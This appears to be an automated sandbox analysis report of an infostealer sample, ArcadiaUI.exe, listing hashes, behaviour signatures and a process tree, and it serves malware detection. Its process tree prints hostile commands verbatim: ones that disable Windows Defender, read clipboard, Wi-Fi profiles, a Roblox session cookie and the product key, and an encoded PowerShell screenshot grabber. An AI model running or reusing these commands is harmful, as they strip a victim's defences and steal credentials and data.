Analysis

  • max time kernel
    92s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2025 15:46

General

  • Target

    Build/ArcadiaUI.exe

  • Size

    9.6MB

  • MD5

    935811dc5d515b089afe293d4471d215

  • SHA1

    9e7d4ec78767b94752ec657fdd7dc5a83e6d1cd8

  • SHA256

    d5be09b425b16925940fa291de9f802051e7cd366dbd6dba66742e334ef8dd90

  • SHA512

    1aa7704c31971cd84dcffc31bedeff99b97fb589a2499a0a633d3dc6f80024d9fa19c347fa12530d92c597b1ab4eb2f89b98a5a127ace1af2b49edec9d7b6647

  • SSDEEP

    196608:nd1dXlQZ5tLBxApPwfI9jUCnORird1KfbLOYgN2oc+nBIdAx3:dbiZ5tMpEIHOQ76bynnBIK

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe
    "C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:396
    • C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe
      "C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaUI.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2836
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4880
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:2012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‏   .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‏   .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:4636
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3496
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4268
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:760
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k4eifzm4\k4eifzm4.cmdline"
              5⤵
                PID:1084
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC052.tmp" "c:\Users\Admin\AppData\Local\Temp\k4eifzm4\CSC5E1C1547363E4938BB5F1CA6582B78.TMP"
                  6⤵
                    PID:1736
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1644
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:3528
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:4716
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:996
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4004
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3388
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1328
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1080
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4440
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4704
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:4332
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1652
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:1536
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4244
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:4508
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:4200
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe a -r -hp"Cortez_2011" "C:\Users\Admin\AppData\Local\Temp\99dRs.zip" *"
                                        3⤵
                                          PID:2372
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe a -r -hp"Cortez_2011" "C:\Users\Admin\AppData\Local\Temp\99dRs.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4800
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:244
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4428
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:1592
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic computersystem get totalphysicalmemory
                                                4⤵
                                                  PID:3236
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                3⤵
                                                  PID:940
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic csproduct get uuid
                                                    4⤵
                                                      PID:4528
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                    3⤵
                                                      PID:2756
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3028
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      3⤵
                                                        PID:2448
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic path win32_VideoController get name
                                                          4⤵
                                                          • Detects videocard installed
                                                          PID:1296
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                        3⤵
                                                          PID:3448
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3820

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      8740e7db6a0d290c198447b1f16d5281

                                                      SHA1

                                                      ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                      SHA256

                                                      f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                      SHA512

                                                      d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      bd5940f08d0be56e65e5f2aaf47c538e

                                                      SHA1

                                                      d7e31b87866e5e383ab5499da64aba50f03e8443

                                                      SHA256

